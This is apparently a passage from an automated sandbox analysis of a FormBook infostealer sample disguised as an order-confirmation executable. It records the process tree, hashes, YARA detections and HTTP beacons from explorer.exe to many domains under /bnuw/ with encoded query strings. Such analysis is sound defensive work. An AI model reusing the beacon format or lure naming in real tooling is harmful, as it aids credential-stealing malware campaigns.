3d 31 22 3e 0a 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 61 6e 64 20 54 6f 75 63 68 20 49 63 6f 6e 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6c 
69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
                                                                                                                                                        Data Ascii: 3d8c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Toy-Aisle.com - Shop for toys, not ads.</title> ... SEO Meta Tags--> ... <meta name="description" content="Cartzilla - Bootstrap E-commerce Template"> <meta name="keywords" content="bootstrap, shop, e-commerce, market, modern, responsive, business, mobile, bootstrap 4, html5, css3, jquery, js, gallery, slider, touch, creative, clean"> --> <meta name="author" content="Toy-Aisle.com"> ... Viewport--> <meta name="viewport" content="width=device-width, initial-scale=1"> ... Favicon and Touch Icons--> ... <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="ico


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.5 | 49767 | 154.204.140.233 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:42:22.651658058 CET | 6342 | OUT | GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1
Host: www.dmvantalya.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:42:22.952120066 CET | 6343 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Jan 2021 14:42:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
                                                                                                                                                        Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.5 | 49768 | 46.38.226.47 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:42:28.011893988 CET | 6343 | OUT | GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1
Host: www.husum-ferienwohnungen.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:42:28.059879065 CET | 6345 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 27 Jan 2021 14:42:28 GMT
Content-Type: text/html
Content-Length: 1039
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 24 Feb 2015 16:29:52 GMT
ETag: "40f-50fd8074406b0"
Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 65 62 31 32 32 2e 73 65 72 76 65 72 30 31 2e 66 72 75 69 74 6d 65 64 69 61 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 
20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69 6e 67 0a 20 20 20 2d 20 72 69 67 68 74 20 6e 6f 77 2e 0a 20 20 20 2d 2d 3e 0a
                                                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at web122.server01.fruitmedia.de</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49735 | 51.195.43.214 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:07.924004078 CET | 5340 | OUT | GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1
Host: www.alliswell.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:07.984159946 CET | 5340 | IN | HTTP/1.1 302 Found
date: Wed, 27 Jan 2021 14:40:07 GMT
location: https://www.alliswell.info/bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH
content-length: 0
content-type: text/html; charset=UTF-8
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49736 | 172.120.228.88 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:13.548455954 CET | 5341 | OUT | GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1
Host: www.czb878.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:13.742654085 CET | 5342 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 27 Jan 2021 14:40:13 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.czb878.com/bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49738 | 192.0.78.25 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:18.892349958 CET | 5348 | OUT | GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1
Host: www.brendonellis.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:18.935271025 CET | 5349 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 27 Jan 2021 14:40:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
X-ac: 2.hhn _dca
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49739 | 3.13.31.214 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:24.152700901 CET | 5353 | OUT | GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1
Host: www.purposelyproductivelab.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:24.288676977 CET | 5354 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=utf-8
Location: https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH
X-Redirector-Version: 2.15.3-9d502ae
Date: Wed, 27 Jan 2021 14:40:24 GMT
Content-Length: 163
Connection: close
Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 75 72 70 6f 73 65 6c 79 70 72 6f 64 75 63 74 69 76 65 6c 61 62 2e 63 6f 6d 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 48 39 65 46 4b 50 54 33 50 5a 36 2b 4a 45 75 6b 6d 6f 6c 34 49 61 6b 4d 37 52 6e 31 62 54 59 49 37 64 61 33 41 51 68 45 6d 5a 4f 54 77 74 58 66 6b 34 63 34 67 57 58 66 75 63 33 74 37 32 53 6d 55 36 65 66 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
Data Ascii: <a href="https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&amp;VPXh=GhIH">Moved Permanently</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49740 | 3.0.139.114 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:29.565974951 CET | 5356 | OUT | GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1
Host: www.ekpays.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:29.750543118 CET | 5356 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Wed, 27 Jan 2021 14:40:29 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49741 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:39.913343906 CET | 5357 | OUT | GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1
Host: www.beachesvr.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:40.054193974 CET | 5358 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 27 Jan 2021 14:40:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "600b4d16-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.5 | 49742 | 192.249.115.168 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:45.429397106 CET | 5360 | OUT | GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1
Host: www.secretlairtoys.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:45.696475029 CET | 5361 | IN | HTTP/1.1 200 OK
Date: Wed, 27 Jan 2021 14:40:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=719593c0217835c75a4268d80b73ca25; path=/; domain=.secretlairtoys.com
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 33 64 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 20 2d 20 53 68 6f 70 20 66 6f 72 20 74 6f 79 73 2c 20 6e 6f 74 20 61 64 73 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 21 2d 2d 20 53 45 4f 20 4d 65 74 61 20 54 61 67 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 72 74 7a 69 6c 6c 61 20 2d 20 42 6f 6f 74 73 74 72 61 70 20 45 2d 63 6f 6d 6d 65 72 63 65 20 54 65 6d 70 6c 61 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6f 6f 74 73 74 72 61 70 2c 20 73 68 6f 70 2c 20 65 2d 63 6f 6d 6d 65 72 63 65 2c 20 6d 61 72 6b 65 74 2c 20 6d 6f 64 65 72 6e 2c 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 20 62 75 73 69 6e 65 73 73 2c 20 6d 6f 62 69 6c 65 2c 20 62 6f 6f 74 73 74 72 61 70 20 34 2c 20 68 74 6d 6c 35 2c 20 63 73 73 33 2c 20 6a 71 75 65 72 79 2c 20 6a 73 2c 20 67 61 6c 6c 65 72 79 2c 20 73 6c 69 64 65 72 2c 20 74 6f 75 63 68 2c 20 63 72 65 61 74 69 76 65 2c 20 63 6c 65 61 6e 22 3e 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 22 3e 0a 20 20 3c 21 2d 2d 20 56 69 65 77 70 6f 72 74 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 61 6e 64 20 54 6f 75 63 68 20 49 63 6f 6e 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
Data Ascii: 3d8c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Toy-Aisle.com - Shop for toys, not ads.</title> ... SEO Meta Tags--> ... <meta name="description" content="Cartzilla - Bootstrap E-commerce Template"> <meta name="keywords" content="bootstrap, shop, e-commerce, market, modern, responsive, business, mobile, bootstrap 4, html5, css3, jquery, js, gallery, slider, touch, creative, clean"> --> <meta name="author" content="Toy-Aisle.com"> ... Viewport--> <meta name="viewport" content="width=device-width, initial-scale=1"> ... Favicon and Touch Icons--> ... <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="ico


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time:15:38:52
Start date:27/01/2021
Path:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe'
Imagebase:0x400000
File size:596473 bytes
MD5 hash:B18E939428B3FFC67C750E2A0988D61A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:15:38:53
Start date:27/01/2021
Path:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
Imagebase:0xb30000
File size:893608 bytes
MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 5%, Metadefender, Browse
• Detection: 0%, ReversingLabs
Reputation:moderate

General

Start time:15:38:55
Start date:27/01/2021
Path:C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
Imagebase:0x400000
File size:893608 bytes
MD5 hash:535DD1329AEF11BF4654B3270F026D5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:00
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:
